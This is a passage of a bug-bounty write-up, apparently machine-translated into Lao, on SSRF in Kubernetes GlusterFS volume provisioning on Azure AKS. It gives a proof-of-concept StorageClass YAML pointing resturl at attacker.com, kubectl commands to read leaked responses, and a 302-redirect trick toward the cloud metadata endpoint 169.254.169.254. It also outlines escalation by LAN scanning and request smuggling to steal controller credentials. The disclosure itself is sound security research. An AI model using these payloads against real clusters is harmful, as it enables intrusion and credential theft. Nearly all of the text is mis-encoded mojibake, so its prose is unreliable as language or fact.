เบซเบกเบฒเบโเปเบซเบโ. เปเบ.: เบเบนเปเบเบฝเบเบเบญเบเบเบปเบเบเบงเบฒเบกเบเบตเปเบชเบปเบเบเบฐเบเบฒเปเบเบฅเบฒเบเบฅเบฐเบญเบฝเบเบเปเบฝเบงเบเบฑเบเบงเบดเบเบตเบเบตเปเปเบเบปเบฒเปเบเบปเปเบฒเบเบฑเบเบเบฒเบเปเบเบทเปเบญเบเบปเปเบเบเบปเบเบเบธเบเบญเปเบญเบ
เบเบงเบเปเบฎเบปเบฒเปเบกเปเบเปเบ
เบเบงเบเปเบฎเบปเบฒเปเบเบฑเบเบเบฑเบเบงเบดเปเบเบเปเบฒเบเบเบงเบฒเบกเบเบญเบเปเบเบเบญเบเบเบฃเบฑเปเบเบชเบญเบเบเบปเบเบเบตเปเปเบเปเบฎเปเบงเบกเบเบฑเบเบเบปเปเบเบเบปเบเบเบธเบเบญเปเบญเบเปเบ Kubernetes. เบเบทเปเบเบญเบเบเบงเบเปเบฎเบปเบฒเปเบกเปเบ Brice Augras เปเบฅเบฐ Christophe Hauquiert, เปเบเปเปเบเบซเบผเบฒเบเปเบงเบเบต Bug Bounty เบเบงเบเปเบฎเบปเบฒเปเบเบฑเบเบเบตเปเบฎเบนเปเบเบฑเบเปเบเบฑเบ Reeverzax เปเบฅเบฐ Hach เบเบฒเบกเบฅเปเบฒเบเบฑเบ:
-
Brice Augras -เบเปเบฅเบดเบชเบฑเบ Groupe Asten ; -
Christophe Hauquiert - เบชเบฐเบเบฒเบเบฐเบเบดเบ Kubernetes เบขเบนเป Nokia.
เปเบเบตเบโเบซเบเบฑเบโเบเบถเปเบ?
เบเบปเบเบเบฝเบเบเบตเปเปเบกเปเบเบงเบดเบเบตเบเบฒเบเบเบญเบเบเบงเบเปเบฎเบปเบฒเบเบตเปเบเบฐเปเบเปเบเบเบฑเบเบงเบดเบเบตเบเบฒเบเบเบปเปเบเบเปเบงเบฒเปเบเบเบเบฑเปเบเปเบเบตเบกเบเบตเปเบเปเปเบเบฒเบเบเบดเบเปเบเปเบซเบฑเบเปเบเบชเบนเปเบเบฒเบเบเบฐเบเบปเบเปเบเบเบตเปเบซเบเปเบฒเบเบทเปเบเปเบเบฑเปเบเบเบตเปเบชเบธเบเปเบเบเบตเบงเบดเบเบเบญเบเบเบนเปเบฅเปเบฒเปเบกเบเปเบกเป (เบขเปเบฒเบเบซเบเปเบญเบเบชเปเบฒเบฅเบฑเบเปเบเบเบฑเบเบเบธเบเบฑเบ).
เบเบฑเปเบเบเบตเปเปเบเบปเปเบฒเบญเบฒเบเบเบฐเบฎเบนเป, เบเบฑเบเบฅเปเบฒเปเบกเบเปเบกเปเบกเบตเบชเบญเบเบฅเบฑเบเบชเบฐเบเบฐเบเบตเปเปเบเบเปเบเบฑเปเบ:
- เบเบงเบเปเบเบปเบฒเบญเบฒเปเบชเบขเบนเปเปเบ pizza เปเบฅเบฐเปเบเบ;
- เบเบงเบเปเบเบปเบฒเปเบฎเบฑเบเบงเบฝเบเปเบเปเบงเบฅเบฒเบเบตเปเบเบธเบเบเบปเบเบเบญเบเบซเบฅเบฑเบ.
เบเบงเบโเปเบฎเบปเบฒโเบเปเปโเบกเบตโเบเปเปโเบเบปเบโเปเบงเบฑเปเบโเบเปเปโเบเบปเบโเบฅเบฐโเบเบฝเบโเปเบซเบผเบปเปเบฒโเบเบตเป: เบเบปเบโเบเบฐโเบเบดโเปเบฅเปเบงโเบเบงเบโเปเบฎเบปเบฒโเบเบปเบโเบเบฐโเปเบโเบเปเบฒเบโเบญเบฒโเบเบดเบโเปเบฅเบฐโเปเบเปโเปเบงโเบฅเบฒโเบเบทเบโเบเบตเปโเบเบญเบโเบเปเปโเบซเบฅเบฑเบโเบเบฒเบ hacking. เปเบเปเบซเบเบถเปเบเปเบเบเบทเบเปเบซเบผเบปเปเบฒเบเบตเปเบชเบดเปเบเบชเบธเบเบฅเบปเบเปเบเบเบฒเบเบเบตเปเบเบดเบเบเบปเบเบเบฐเบเบดเบซเบผเบฒเบ.
เปเบโเปเบเบทเปเบญเบโเบเบปเปเบโเบเบงเบโเปเบฎเบปเบฒโเบเบฐโเบเบปเบโเบเบฐโเปเบเบทเปเบญโเบเบถเบโเบชเบฒโเบซเบฒโเบฅเบทโเบเบฒเบโเปเบเบปเปเบฒโเบฎเปเบงเบกโเปเบ
เปเบงเบฅเบฒ 11 เปเบกเบเปเบฅเบเบเบงเบเปเบฎเบปเบฒเบเบฑเปเบเบฅเบปเบเปเบเบทเปเบญเปเบฎเบฑเบเบเบฒเบเบเบปเปเบเบเบงเปเบฒเบเบญเบเบเบงเบเปเบฎเบปเบฒเปเบฅเบฐเปเบเบปเปเบฒเบเบญเบเปเบเบเบญเบเปเบเบปเปเบฒ, เบเปเปเบเบเบฑเบเบเบปเบเปเบเปเบฎเบฑเบเบซเบผเบฒเบ. เบกเบฑเบเปเบกเปเบเบเปเบญเบเบเบฒเบเบเบปเปเบเบเปเบงเบฒเบเบตเปเบเบตเปเบเบงเบเปเบฎเบปเบฒเปเบเปเบกเบฒเปเบเบเบปเปเบงเปเบเบเบเบฒเบ MSRC Bug Bounty เปเบฅเบฐเบกเบฒเบเปเบญเบกเบเบฑเบเบเบฒเบเบเบนเบเบฎเบตเบเบชเบดเบเบเบดเบเบดเปเบชเบ.
เบซเบผเบฒเบเบญเบฒเบเบดเบ/เปเบเบทเบญเบเบเปเบฒเบเปเบ, เปเบฅเบฐเบเบปเบเบเบตเปเบเปเปเบเบฒเบเบเบดเบเบเบญเบเบเบงเบเปเบฎเบปเบฒเปเบเปเบชเบปเปเบเบเบปเบเปเบซเปเปเบถเปเบเปเบเบฅเบฒเบเบงเบฑเบเบชเบนเบเบชเบธเบเปเบเบเบฐเบซเบงเบฑเบเบชเบฒเบเบเบญเบ Azure Cloud Bug Bounty - เบเบญเบเบเบฒเบเบญเบฑเบเบเบตเปเบเบงเบเปเบฎเบปเบฒเปเบเปเบฎเบฑเบเบเบฒเบ Kubernetes!
เบญเบตเบเบเบฒเบกเปเบเบเบเบฒเบเบเบปเปเบเบเปเบงเบฒเบเบญเบเบเบงเบเปเบฎเบปเบฒ, เบเบฐเบเบฐเบเปเบฒเบกเบฐเบเบฒเบเบเบงเบฒเบกเบเบญเบเปเบเบเบฐเบฅเบดเบเบเบฐเบเบฑเบ Kubernetes เบเบฑเบเบเบตเบกเบกเบฒ
เบเบญเบเบเบตเปเบเปเบญเบเบขเบฒเบเปเบเบตเบเปเบเปเบเปเปเบกเบนเบเบเปเบฝเบงเบเบฑเบเบเบธเบเบญเปเบญเบเบเบตเปเบเบปเบเปเบซเบฑเบเปเบซเปเบซเบผเบฒเบเปเบเบปเปเบฒเบเบตเปเปเบเบฑเบเปเบเปเบเป. เบเบงเบโเปเบฎเบปเบฒโเบซเบงเบฑเบโเบงเปเบฒโเบเปเบฒเบโเบเบฐโเบเบทเปเบโเบเบปเบกโเบเบฑเบโเบเบฒเบโเบเบญเบโเบซเบฒโเปเบฅเบฐโเปเบเปเบโเบเบฑเบโเบฅเบฒเบโเบฅเบฐโเบญเบฝเบโเบเปเบฒเบโเบงเบดโเบเบฒโเบเบฒเบโเบเบฑเบโเบชเบฐโเบกเบฒโเบเบดเบโเบญเบทเปเบเปโเบเบญเบโเบเบธเบกโเบเบปเบ infosecโ!
เบเบฑเปเบเบเบฑเปเบ, เบเบตเปเปเบกเปเบเปเบฅเบทเปเบญเบเบเบญเบเบเบงเบเปเบฎเบปเบฒ ...
เบชเบฐเบเบฒเบเบเบฒเบ
เปเบเบทเปเบญเปเบฎเบฑเบเปเบซเปเบเบงเบฒเบกเบฎเบนเปเบชเบถเบเบเบตเปเบชเบธเบเบเปเบฝเบงเบเบฑเบเบชเบดเปเบเบเบตเปเปเบเบตเบเบเบถเปเบ, เบเปเบฒเบญเบดเบเปเบซเปเบเบงเบเปเบฎเบปเบฒเปเบเบดเปเบเบงเบดเบเบตเบเบฒเบ Kubernetes เปเบฎเบฑเบเบงเบฝเบเบขเบนเปเปเบเบชเบฐเบเบฒเบเปเบงเบเบฅเปเบญเบกเบเบตเปเบกเบตเบเบฒเบเบเบธเปเบกเบเบญเบเบเบฅเบฒเบง.
เปเบกเบทเปเบญเบเปเบฒเบเบชเปเบฒเบเบเบธเปเบก Kubernetes เบเบฑเบเบเบตเปเบเบชเบฐเบเบฒเบเปเบงเบเบฅเปเบญเบกเบเบฑเปเบเบเปเบฒเบง, เบเบฑเปเบเบเบฒเบเบเบฑเบเบเบฒเบเปเบเบเบเบปเปเบงเปเบเปเบกเปเบเบเบงเบฒเบกเบฎเบฑเบเบเบดเบเบเบญเบเบเบญเบเบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเบเบฅเบฒเบง:
เบเบฑเปเบเบเบงเบเบเบธเบกเปเบกเปเบเบเบฑเปเบเบขเบนเปเบเปเบฅเบดเปเบงเบเบเปเบฅเบดเบกเบดเปเบเบตเบเบญเบเบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเบเบฑเบ, เปเบเบเบฐเบเบฐเบเบตเปเบเปเป Kubernetes เบเบฑเปเบเบขเบนเปเบเปเบฅเบดเปเบงเบเบญเปเบญเบกเบฎเบญเบเบเบญเบเบฅเบนเบเบเปเบฒ.
เปเบเบทเปเบญเบเบฑเบเบชเบฑเบเบเบฐเบฅเบดเบกเบฒเบเปเบเบเปเบเบเบฒเบกเบดเบ, เบเบปเบเปเบเปเบกเปเบเปเบเปเปเบเบทเปเบญเบชเบฐเปเบญเบเบเบงเบเบกเบฑเบเบขเปเบฒเบเปเบเบเบฒเบกเบดเบเบเบฒเบเบเปเบญเบเปเบเบฑเบเบเปเปเบกเบนเบเบเบฒเบเบเบญเบ เปเบฅเบฐ เบเบฝเบเบเบฝเบเบเบงเบเบกเบฑเบเบเบฑเบ PVC (เบเบฒเบเบฎเปเบญเบเบเปเบเบฐเบฅเบดเบกเบฒเบเบขเปเบฒเบเบเปเปเปเบเบทเปเบญเบ, เปเบเบฑเปเบ: เบเบฒเบเบฎเปเบญเบเบเปเบเบฐเบฅเบดเบกเบฒเบ).
เบเบฑเปเบเบเบฑเปเบ, เบซเบผเบฑเบเบเบฒเบ PVC เบเบทเบเบชเปเบฒเบเบเบถเปเบเปเบฅเบฐเบเบนเบเบกเบฑเบเบเบฑเบ StorageClass เปเบเบเบธเปเบก K8s, เบเบฒเบเบเบฐเบเบดเบเบฑเบเปเบเบตเปเบกเปเบเบตเบกเปเบเบทเปเบญเบชเบฐเบซเบเบญเบเบเบฐเบฅเบดเบกเบฒเบเปเบเปเบเบทเบเบเบฐเบเบดเบเบฑเบเปเบเบเบเบนเปเบเบฑเบเบเบฒเบ kube / cloud controller (เบเบทเปเบเบตเปเปเบเปเบเบญเบเปเบกเปเบเบเบถเปเบเบเบฑเบเบเบฒเบเบเปเบญเบ). (เบซเบกเบฒเบโเปเบซเบโ. เปเบ.: เบเบงเบเปเบฎเบปเบฒเปเบเปเบเบฝเบเปเบเบตเปเบกเปเบเบตเบกเบเปเบฝเบงเบเบฑเบ CCM เปเบฅเปเบงเปเบเบเปเบเปเบเบปเบงเบขเปเบฒเบเบเบญเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเบเบญเบเบกเบฑเบเบชเปเบฒเบฅเบฑเบเบซเบเบถเปเบเปเบเบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเบเบฑเบ
เบกเบตเบซเบผเบฒเบเบเบฐเปเบเบเบเบญเบเบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเบเบตเปเบชเบฐเบซเบเบฑเบเบชเบฐเบซเบเบนเบเปเบเบ Kubernetes: เบชเปเบงเบเปเบซเบเปเบเบญเบเบเบงเบเปเบเบปเบฒเปเบกเปเบเบฅเบงเบกเบขเบนเปเปเบ
เปเบเบเบฒเบเบเบปเปเบเบเบงเปเบฒเบเบญเบเบเบงเบเปเบฎเบปเบฒ, เบเบงเบเปเบฎเบปเบฒเปเบเปเบชเบธเบกเปเบชเปเบเบปเบเปเบเบเบฒเบเบชเบฐเบซเบเบญเบเบเบฐเบฅเบดเบกเบฒเบเบเบฒเบเปเบ, เปเบเบดเปเบเปเบเปเบชเบฐเปเบเบเปเบซเปเปเบซเบฑเบเบเปเบฒเบเบฅเบธเปเบกเบเบตเป:
เบเบฒเบเบเบฑเบเบซเบฒเบเบฐเบฅเบดเบกเบฒเบเปเบเบเปเบเบเบฒเบกเบดเบเปเบเบเปเบเปเบเบปเบงเบชเบฐเปเบญเบ Kubernetes เปเบเบเบปเบง
เปเบเบชเบฑเปเบ, เปเบกเบทเปเบญ Kubernetes เบเบทเบเบเปเบฒเปเบเปเบเปเปเบเบชเบฐเบเบฒเบเปเบงเบเบฅเปเบญเบกเบเบตเปเบกเบตเบเบฒเบเบเบธเปเบกเบเบญเบ, เบเบนเปเบเบฑเบเบเบฒเบเบเบงเบเบเบธเบกเปเบกเปเบเบเบงเบฒเบกเบฎเบฑเบเบเบดเบเบเบญเบเบเบญเบเบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเบเบฑเบ, เปเบเปเบเปเบฒเบฎเปเบญเบเบเปเบเบฒเบเบชเปเบฒเบเบเบฐเบฅเบดเบกเบฒเบ (เบเบปเบงเปเบฅเบ 3 เปเบเปเบเบเบงเบฒเบเบเปเบฒเบเปเบเบดเบ) เบญเบญเบเบเบฒเบเปเบเบทเบญเบเปเบฒเบเบเบฒเบเปเบเบเบญเบเบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเบเบฑเบ. เปเบฅเบฐเบเบตเปเปเบกเปเบเบเปเบญเบเบเบตเปเบชเบดเปเบเบเบตเปเบซเบเปเบฒเบชเบปเบเปเบเบซเบผเบฒเบ!
เบชเบฐเบเบฒเบเบฐเบเบฒเบ hacking
เปเบเบเบฒเบเบเบตเป, เบเบงเบเปเบฎเบปเบฒเบเบฐเบญเบฐเบเบดเบเบฒเบเบงเบดเบเบตเบเบตเปเบเบงเบเปเบฎเบปเบฒเปเบเปเปเบเปเบเบฐเปเบซเบเบเบเบฒเบเบเบฐเบเบงเบเบเบฒเบเปเบฎเบฑเบเบงเบฝเบเบเบตเปเปเบเปเบเปเบฒเบงเบกเบฒเบเปเบฒเบเปเบเบดเบเปเบฅเบฐเปเบเบปเปเบฒเปเบเบดเบเบเบฑเบเบเบฐเบเบฒเบเบญเบเบเบฒเบเปเบเบเบญเบเบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเบเบฑเบ. เบกเบฑเบเบเบฑเบเบเบฐเบชเบฐเปเบเบเปเบซเปเบเปเบฒเบเปเบซเบฑเบเบงเบดเบเบตเบเบตเปเบเปเบฒเบเบชเบฒเบกเบฒเบเบเบฐเบเบดเบเบฑเบเบเบฒเบเบเปเบฒเปเบเบตเบเบเบฒเบเบเบฒเบเบขเปเบฒเบเปเบเบฑเปเบ: เบเบฒเบเปเบเปเบฎเบฑเบเบเปเปเบกเบนเบเบเบฐเบเปเบฒเบเบปเบงเบเบฒเบเปเบเบซเบผเบทเบเบฒเบเปเบเบตเปเบกเบชเบดเบเบเบดเบเบดเปเบชเบ.
เบเบฒเบเบซเบกเบนเบเปเบเปเปเบเบเบเปเบฒเบเปเบญเบฑเบเปเบถเปเบ (เปเบเบเปเบฅเบฐเบเบตเบเบตเป, Service Side Request Forgery) เปเบเปเบเปเบงเบเบเปเบฒเบกเบชเบฐเบเบฒเบเปเบงเบเบฅเปเบญเบกเบเบญเบเบฅเบนเบเบเปเบฒเปเบเบปเปเบฒเปเบเปเบเบเบธเปเบกเบเบญเบเบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเบเปเบฒเบเปเบเบฒเบเปเบเปเบเบฒเบเบเบธเปเบกเบเบญเบ K8s.
เปเบเบเบฒเบเบเบปเปเบเบเบงเปเบฒเบเบญเบเบเบงเบเปเบฎเบปเบฒเบเบงเบเปเบฎเบปเบฒเปเบเปเบชเบธเบกเปเบชเปเบเบฒเบเบชเบฐเบซเบเบญเบ GlusterFS. เปเบเบดเบเบงเปเบฒเบเบฐเบกเบตเบเบงเบฒเบกเบเบดเบเบเบตเปเบงเปเบฒเบฅเปเบฒเบเบฑเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเปเบเบตเปเบกเปเบเบตเบกเปเบเปเบเบทเบเบญเบฐเบเบดเบเบฒเบเปเบเบชเบฐเบเบฒเบเบเบฒเบเบเบตเป, Quobyte, StorageOS เปเบฅเบฐ ScaleIO เบกเบตเบเบงเบฒเบกเบญเปเบญเบเปเบซเบงเบเปเปเบเบฑเบเบเบงเบฒเบกเบญเปเบญเบเปเบญเบเบฝเบงเบเบฑเบ.
เบเบฒเบเบฅเบฐเปเบกเบตเบเบเบปเบเปเบเบเบฒเบเบชเบฐเบซเบเบญเบเบเบฐเบฅเบดเบกเบฒเบเปเบเบเปเบเบทเปเบญเบเปเบซเบง
เปเบเบฅเบฐเบซเบงเปเบฒเบเบเบฒเบเบงเบดเปเบเบฒเบฐเบเบฑเปเบเปเบเบฑเบเบฎเบฑเบเบชเบฒ GlusterFS เปเบเบฅเบฐเบซเบฑเบเปเบซเบผเปเบเบฅเบนเบเบเปเบฒ Golang เบเบงเบเปเบฎเบปเบฒ resturl
เปเบกเปเบเปเบเบตเปเบก /volumes
.
เบเบงเบเปเบฎเบปเบฒเปเบเปเบเบฑเบเบชเบดเบเปเบเบเบตเปเบเบฐเบเปเบฒเบเบฑเบเปเบชเบฑเปเบเบเบฒเบเปเบเบตเปเบกเปเบเบตเบกเบเบตเปเปเบเบเบเบฒเบเปเบเบตเปเบก #
เปเบเบเบฒเบฅเบฒเบกเบดเปเบเบต resturl
. เบเบตเปเปเบกเปเบเบเบฒเบเบเบฑเปเบเบเปเบฒ YAML เบเปเบฒเบญเบดเบเบเบตเปเบเบงเบเปเบฎเบปเบฒเปเบเปเปเบเบทเปเบญเบเบปเบเบชเบญเบเบเบงเบฒเบกเบญเปเบญเบเปเบญเบเบญเบ SSRF เปเบเบดเปเบเบเบฒเบเบญเบ. (เบเปเบฒเบเบชเบฒเบกเบฒเบเบญเปเบฒเบเปเบเบตเปเบกเปเบเบตเบกเบเปเบฝเบงเบเบฑเบ SSRF เปเบเบดเปเบเบเบฒเบเบญเบเบซเบผเบทเปเบเบดเปเบเบซเบเบถเปเบเบเบฒเบเบญเบ, เบชเปเบฒเบฅเบฑเบเบเบฒเบเบเบปเบเบเบปเบงเบขเปเบฒเบ,
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: poc-ssrf
spec:
accessModes:
- ReadWriteOnce
volumeMode: Filesystem
resources:
requests:
storage: 8Gi
storageClassName: poc-ssrf
เบซเบผเบฑเบเบเบฒเบเบเบฑเปเบ, เบเบงเบเปเบฎเบปเบฒเปเบเป binary เปเบเบทเปเบญเบเบฑเบเบเบฒเบเบเบธเปเบก Kubernetes เบเบฒเบเปเบฅเบเบฐเปเบ kubectl. เปเบเบเบเบปเบเบเบฐเบเบด, เบเบนเปเปเบซเปเบเปเบฅเบดเบเบฒเบเบเบฑเบ (Azure, Google, AWS, เปเบฅเบฐเบญเบทเปเบเป) เบญเบฐเบเบธเบเบฒเบเปเบซเปเบเปเบฒเบเปเบเปเบฎเบฑเบเบเปเปเบกเบนเบเบเบฐเบเปเบฒเบเบปเบงเบชเปเบฒเบฅเบฑเบเบเบฒเบเบเปเบฒเปเบเปเบเบฐเปเบซเบเบเบเบตเป.
เบเปเบเบญเบเปเบเบเบฑเบเบชเบดเปเบเบเบตเป, เบเปเบญเบเบชเบฒเบกเบฒเบเปเบเปเปเบเบฅเป "เบเบดเปเบชเบ" เบเบญเบเบเปเบญเบ. Kube-controller-manager เบเบฐเบเบดเบเบฑเบเบเบฒเบเบฎเปเบญเบเบเป HTTP เบเบตเปเปเบเปเบฎเบฑเบเบเบปเบ:
kubectl create -f sc-poc.yaml
เบเปเบฒเบเบญเบเบเบฒเบเบเบฑเบเบชเบฐเบเบฐเบเบญเบเบเบนเปเปเบเบกเบเบต
เบซเบผเบฑเบเบเบฒเบเบเบฑเปเบเบเปเปเบเบปเบ, เบเบงเบเปเบฎเบปเบฒเบเบฑเบเบชเบฒเบกเบฒเบเปเบเปเบฎเบฑเบเบเบฒเบเบเบญเบเบชเบฐเบซเบเบญเบ HTTP เบเบฒเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบเปเบเบปเปเบฒเบซเบกเบฒเบ - เบเปเบฒเบเบเปเบฒเบชเบฑเปเบ describe pvc
เบซเบผเบท get events
เปเบ kubectl. เปเบฅเบฐเปเบเปเบเบดเบเปเบฅเปเบง: เปเบเปเบงเบต Kubernetes เปเบฅเบตเปเบกเบเบปเปเบเบเบตเปเปเบกเปเบเปเบงเบปเปเบฒเปเบเบตเบเปเบเปเบเบเบฒเบเปเบเบทเบญเบเปเบ / เบเปเปเบเบงเบฒเบกเบชเบฐเปเบเบเบเปเปเบเบดเบเบเบฒเบเบเบญเบเบกเบฑเบ ...
เบเบตเปเปเบกเปเบเบเบปเบงเบขเปเบฒเบเบเบตเปเบกเบตเบเบฒเบเปเบเบทเปเบญเบกเบเปเปเบเบฑเบ https://www.google.fr
เบเบฑเปเบเปเบเบฑเบเบเบฒเบฅเบฒเบกเบดเปเบเบต resturl
:
kubectl describe pvc poc-ssrf
# ะธะปะธ ะถะต ะผะพะถะตัะต ะฒะพัะฟะพะปัะทะพะฒะฐัััั kubectl get events
เปเบเบงเบดเบเบตเบเบฒเบเบเบตเป, เบเบงเบเปเบฎเบปเบฒเบเบทเบเบเปเบฒเบเบฑเบเบเบฝเบเปเบเปเบเปเบฒเบเบฒเบกเปเบเบฑเปเบ HTTP POST เปเบฅเบฐเบเปเปเบชเบฒเบกเบฒเบเปเบเปเบฎเบฑเบเปเบเบทเปเบญเปเบเบเบญเบเบฎเปเบฒเบเบเบฒเบเบเบญเบเบชเบฐเบซเบเบญเบเบเปเบฒเบซเบฒเบเบงเปเบฒเบฅเบฐเบซเบฑเบเบเบฑเบเบเบทเบเปเบกเปเบ 201. เบเบฑเปเบเบเบฑเปเบ, เบเบงเบเปเบฎเบปเบฒเบเบฑเบเบชเบดเบเปเบเบเปเบฒเปเบเบตเบเบเบฒเบเบเบปเปเบเบเปเบงเบฒเปเบเบตเปเบกเปเบเบตเบกเปเบฅเบฐเบเบฐเบซเบเบฒเบเบชเบฐเบเบฒเบเบฐเบเบฒเบเบเบฒเบ hack เบเบตเปเบเปเบงเบเบงเบดเบเบตเบเบฒเบเปเบซเบกเป.
เบงเบดเบงเบฑเบเบเบฐเบเบฒเบเบฒเบเบเบญเบเบเบฒเบเบเบปเปเบเบเบงเปเบฒเบเบญเบเบเบงเบเปเบฎเบปเบฒ
- เบชเบฐเบเบฒเบเบฐเบเบฒเบเบเบฑเปเบเบชเบนเบ #1: เบเบฒเบเบเปเบฒเปเบเปเบเบฒเบเบเปเบฝเบเปเบชเบฑเปเบเบเบฒเบ 302 เบเบฒเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบเบเบฒเบเบเบญเบเปเบเบทเปเบญเบเปเบฝเบเบงเบดเบเบตเบเบฒเบ HTTP เปเบเบทเปเบญเปเบซเปเบกเบตเบงเบดเบเบตเบเบฒเบเบเบตเปเบกเบตเบเบงเบฒเบกเบเบทเบเบซเบเบธเปเบเบซเบผเบฒเบเปเบเบเบฒเบเปเบเบฑเบเบเปเบฒเบเปเปเบกเบนเบเบเบฒเบเปเบ.
- เบชเบฐเบเบฒเบเบฐเบเบฒเบเบเบฑเปเบเบชเบนเบ #2: เบญเบฑเบเบเบฐเปเบเบกเบฑเบเบเบฒเบเบชเบฐเปเบเบ LAN เปเบฅเบฐเบเบฒเบเบเบปเปเบเบเบปเบเบเบฑเบเบเบฐเบเบฒเบเบญเบเบเบฒเบเปเบ.
- เบชเบฐเบเบฒเบเบฐเบเบฒเบเบเบฑเปเบเบชเบนเบ #3: เบเบฒเบเปเบเป HTTP CRLF + smuggling (โเบฎเปเบญเบเบเปเบเบฒเบเบฅเบฑเบเบฅเบญเบโ) เปเบเบทเปเบญเบชเปเบฒเบเบเบฒเบเบฎเปเบญเบเบเป HTTP เบเบตเปเบเบฑเบเปเบเปเบเปเบฅเปเบงเปเบญเบปเบฒเบเปเปเบกเบนเบเบเบตเปเบชเบฐเบเบฑเบเบเบฒเบเบเบฑเบเบเบถเบ kube-controller.
เบเปเปเบกเบนเบเบเปเบฒเปเบเบฒเบฐ
- เบเบฒเบเบเบปเปเบเบเบงเปเบฒเปเบเปเบเปเบฒเปเบเป Azure Kubernetes Service (AKS) เบเบฑเบ Kubernetes เบฎเบธเปเบ 1.12 เปเบเบเบฒเบเบเบทเปเบเปเบญเบตเบฃเบปเบเปเบซเบเบทเบญ.
- เบชเบฐเบเบฒเบเบฐเบเบฒเบเบเบตเปเบญเบฐเบเบดเบเบฒเบเบเปเบฒเบเปเบเบดเบเบเบตเปเปเบเปเบเบทเบเบเบฐเบเบดเบเบฑเบเปเบเบเบฒเบเบเปเบญเบเบซเบฅเปเบฒเบชเบธเบเบเบญเบ Kubernetes, เบเบปเบเปเบงเบฑเปเบเบชเบฐเบเบฒเบเบฐเบเบฒเบเบเบตเบชเบฒเบก, เปเบเบฒเบฐเบงเปเบฒ เบฅเบฒเบงเบเปเบญเบเบเบฒเบ Kubernetes เบชเปเบฒเบเบเบถเปเบเบเปเบงเบ Golang เบฎเบธเปเบ โค 1.12.
- เปเบเบตเบเปเบงเบตเบเบฒเบเบเบญเบเบเบญเบเบเบนเปเปเบเบกเบเบต -
https://attacker.com
.
เบชเบฐเบเบฒเบเบฐเบเบฒเบเบเบฑเปเบเบชเบนเบ #1: เบเบฒเบเบเปเบฝเบเปเบชเบฑเปเบเบเบฒเบเบเบฒเบเบฎเปเบญเบเบเป HTTP POST เปเบเบซเบฒ GET เปเบฅเบฐเบฎเบฑเบเบเปเปเบกเบนเบเบเบตเปเบฅเบฐเบญเบฝเบเบญเปเบญเบ
เบงเบดเบเบตเบเบฒเบเบเบปเปเบเบชเบฐเบเบฑเบเปเบเปเบเบทเบเบเบฑเบเบเบธเบเปเบเบเบเบฒเบเบเบฑเปเบเบเปเบฒเบเบญเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบเบเบญเบเบเบนเปเปเบเบกเบเบตเบเบตเปเบเบฐเบเบฑเบเบเบทเบเบกเบฒ 302 HTTP Retcodeเปเบเบทเปเบญเบเปเบฝเบเบเปเบฒเบฎเปเบญเบเบเป POST เปเบเบฑเบเบเบฒเบเบฎเปเบญเบเบเป GET (เบเบฑเปเบเบเบญเบ 4 เปเบเปเบเบเบงเบฒเบ):
เบเปเบฒเบฎเปเบญเบเบเปเบเปเบฒเบญเบดเบ (3) เบกเบฒเบเบฒเบเบฅเบนเบเบเปเบฒ GlusterFS (เบเบนเปเบเบฑเบเบเบฒเบเบเบงเบเบเบธเบก), เบกเบตเบเบฐเปเบเบ POST. เปเบเบเบเบฐเบเบดเบเบฑเบเบเบฒเบกเบเบฑเปเบเบเบญเบเปเบซเบผเบปเปเบฒเบเบตเป, เบเบงเบเปเบฎเบปเบฒเบชเบฒเบกเบฒเบเบเปเบฝเบเบกเบฑเบเปเบเบปเปเบฒเปเบเปเบ GET:
- เปเบเบฑเบเบเบฒเบฅเบฒเบกเบดเปเบเบต
resturl
เปเบ StorageClass เบกเบฑเบเปเบเปเบเบทเบเบเบตเปเบเบญเบhttp://attacker.com/redirect.php
. - Endpoint
https://attacker.com/redirect.php
เบเบญเบเบชเบฐเปเบญเบเบเปเบงเบเบฅเบฐเบซเบฑเบเบชเบฐเบเบฒเบเบฐ HTTP 302 เบเบตเปเบกเบตเบชเปเบงเบเบซเบปเบงเบชเบฐเบเบฒเบเบเบตเปเบเปเปเปเบเบเบตเป:http://169.254.169.254
. เบเบตเปเบชเบฒเบกเบฒเบเปเบเบฑเบเบเบฑเบเบเบฐเบเบฒเบเบญเบเบเบฒเบเปเบเบญเบทเปเบเป - เปเบเบเปเบฅเบฐเบเบตเบเบตเป, เบเบฒเบเปเบเบทเปเบญเบกเบเปเปเบเบฒเบเบเปเบฝเบเปเบชเบฑเปเบเบเบฒเบเบเบทเบเบเปเบฒเปเบเปเบเบฝเบเปเบเปเปเบเบฑเบเบเบปเบงเบขเปเบฒเบ. - เบเบฑเปเบเปเบเปเบเบญเบเบเบปเปเบ net/http เบซเปเบชเบฐเบซเบกเบธเบ Golang เบเปเบฝเบเปเบชเบฑเปเบเบเบฒเบเบเบฒเบเบฎเปเบญเบเบเปเปเบฅเบฐเบเปเบฝเบ POST เปเบเบฑเบ GET เบเปเบงเบเบฅเบฐเบซเบฑเบเบชเบฐเบเบฒเบเบฐ 302, เบชเบปเปเบเบเบปเบเปเบซเปเบเปเบฒเบฎเปเบญเบเบเป HTTP GET เปเบเบซเบฒเบเบฑเบเบเบฐเบเบฒเบเบญเบเปเบเบปเปเบฒเบซเบกเบฒเบ.
เปเบเบทเปเบญเบญเปเบฒเบเบฎเปเบฒเบเบเบฒเบเบเบญเบเบชเบฐเบซเบเบญเบ HTTP เบเปเบฒเบเบเปเบญเบเปเบฎเบฑเบ describe
เบงเบฑเบเบเบธ PVC:
kubectl describe pvc xxx
เบเบตเปเปเบกเปเบเบเบปเบงเบขเปเบฒเบเบเบญเบเบเบฒเบเบเบญเบ HTTP เปเบเบฎเบนเบเปเบเบ JSON เบเบตเปเบเบงเบเปเบฎเบปเบฒเบชเบฒเบกเบฒเบเปเบเปเบฎเบฑเบ:
